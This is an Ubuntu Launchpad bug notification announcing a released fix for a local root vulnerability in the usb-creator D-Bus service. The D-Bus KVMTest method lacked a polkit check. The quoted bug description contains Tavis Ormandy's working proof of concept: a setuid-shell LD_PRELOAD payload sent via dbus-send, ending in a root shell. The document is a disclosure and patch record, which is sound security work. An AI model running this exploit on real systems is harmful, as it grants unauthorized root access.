[Bug 1447396] Re: Tavis Ormandy discovered a local root vulnerability with the com.ubuntu.USBCreator dbus service

Launchpad Bug Tracker 1447396 at bugs.launchpad.net
Thu Apr 23 14:03:38 UTC 2015 

This bug was fixed in the package usb-creator - 0.2.67ubuntu0.1

---------------
usb-creator (0.2.67ubuntu0.1) vivid-security; urgency=medium

  * SECURITY UPDATE: privilege escalation via missing polkit check
    (LP: #1447396)
    - bin/usb-creator-helper, dbus/com.ubuntu.usbcreator.policy.in: add
      proper polkit integration for KVM use.
    - CVE number pending
 -- Marc Deslauriers <marc.deslauriers at ubuntu.com>   Wed, 22 Apr 2015 23:10:43 -0400

** Changed in: usb-creator (Ubuntu Vivid)
       Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to usb-creator in Ubuntu.
https://bugs.launchpad.net/bugs/1447396

Title:
  Tavis Ormandy discovered a local root vulnerability with the
  com.ubuntu.USBCreator dbus service

Status in usb-creator package in Ubuntu:
  Fix Released
Status in usb-creator source package in Precise:
  Fix Released
Status in usb-creator source package in Trusty:
  Fix Released
Status in usb-creator source package in Utopic:
  Fix Released
Status in usb-creator source package in Vivid:
  Fix Released

Bug description:
  Reported on oss-security: http://www.openwall.com/lists/oss-
  security/2015/04/22/12

  Text from Tavis follows:

  Hello,

  [as-per previous discussion on the vendors list, skipping closed
  discussion of low-severity issue]

  On my Ubuntu VM, I have a D-Bus service listening on
  com.ubuntu.USBCreator. As far as I can tell, this is installed by
  default.

  It looks like the author intended for all the methods to call
  check_polkit, but KVMTest doesn't.

  This seems like an obvious mistake, and the following appears to work
  on my machine:

  $ cat > test.c
  void __attribute__((constructor)) init (void)
  {
  chown("/tmp/test", 0, 0);
  chmod("/tmp/test", 04755);
  }
  ^D
  $ gcc -shared -fPIC -o /tmp/test.so test.c
  $ cp /bin/sh /tmp/test
  $ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
  /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
  dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
  method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
  $ ls -l /tmp/test
  -rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
  $ /tmp/test
  # id
  euid=0(root) groups=0(root)

  Thanks, Tavis.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/usb-creator/+bug/1447396/+subscriptions

More information about the foundations-bugs mailing list